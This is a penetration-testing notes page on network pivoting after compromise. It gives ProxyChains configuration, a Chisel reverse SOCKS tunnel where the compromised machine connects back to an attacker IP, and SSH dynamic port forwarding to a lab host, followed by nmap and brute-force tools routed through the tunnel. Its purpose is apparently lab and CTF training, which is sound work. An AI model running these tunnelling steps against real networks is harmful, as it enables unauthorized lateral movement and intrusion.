Pivoting ( ProxyChains )

PreviousPost Exploit Checks NextPost Exploit Checks

Last updated 2 years ago

Was this helpful?

Pivoting ( ProxyChains )

Pivoting lets the attacker access the services/machines the compromised machines connected to.

Pivoting allows the attacker to enlarge the attack surface by performing actions as the network-connected machine

Tools Required:

ProxyChains

sudo apt install proxychains

SSH / CHISEL

NEED: With proxychains tools which are not available in the compromised machine can be used from the attaker machine (eg: medusa etc..,)

kali -> proxychains -> compromised_machine -> request for accessing from internal_machine -> internal_machine:80

Exploitation

After installing proxychains in the attackers machine
Configure the port that will be used by the proxychains with its protocol being SOCK Proxy

sudo vi /etc/proxychains.conf

# comment the last line 9050 --> used by TOR
# add the following
# socks5 127.0.0.1 <some port>
socks5 127.0.0.1 9051

Perform Dynamic port forwarding

Chisel

When SSH Password is not available, make use of chisel to perform
Start a chisel server on the attacker machine

# attacker IP: 192.168.1.1
# syntax: ./chisel server -p {port} --reverse
./chisel server -p 1337 --reverse

On the compromised machine connect to the attackers reverse connection

# syntax: chisel client {attacker IP}:{port on chisel server} R:socks
./chisel client 192.168.1.1:1337 R:socks # on a debian based machine
chisel.exe client 192.168.1.1:1337 R:socks # on a windows machine

Once the connection is made successfully from the compromised machine to the attackers machine, the chisel on the attackers machine will show the port the chisel is connected to

2021/01/15 17:11:47 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

By default chisel will connect on port 1080, so lets change the configuration in the proxychains to perform actions on this port (1080)

sudo vi /etc/proxychains.conf

# comment the last line 9050 --> used by TOR
# add the following
socks5 127.0.0.1 1080

Now we can execute commands with proxychains

proxychains nmap -p- internalIp

SSH

Perform Dynamic Port Forwarding

ssh -D 9051 charix@10.10.10.84 # 9051 is the port configured in proxychains.conf file

Once the connection initializes, an attacker can use proxychains to leverage the attack surface

Legend
- 1 - Added the port 9051 in the /etc/proxychains config file
- 2 - Inspecting the port activity of 9051 in attackers machine
- 3 - Dynamic port forwarding to the port configured in proxychains -D 9051
- 4 - Activity on the port 9051 in attakcers machine
- 5 - Grabbing banner of the service running on port 25 in the compromised machine
- 6 - Using proxy chains to obtain the banner of the service on port 25 in the compromised machine

Bruteforces / Automated attack tools can be used with proxychains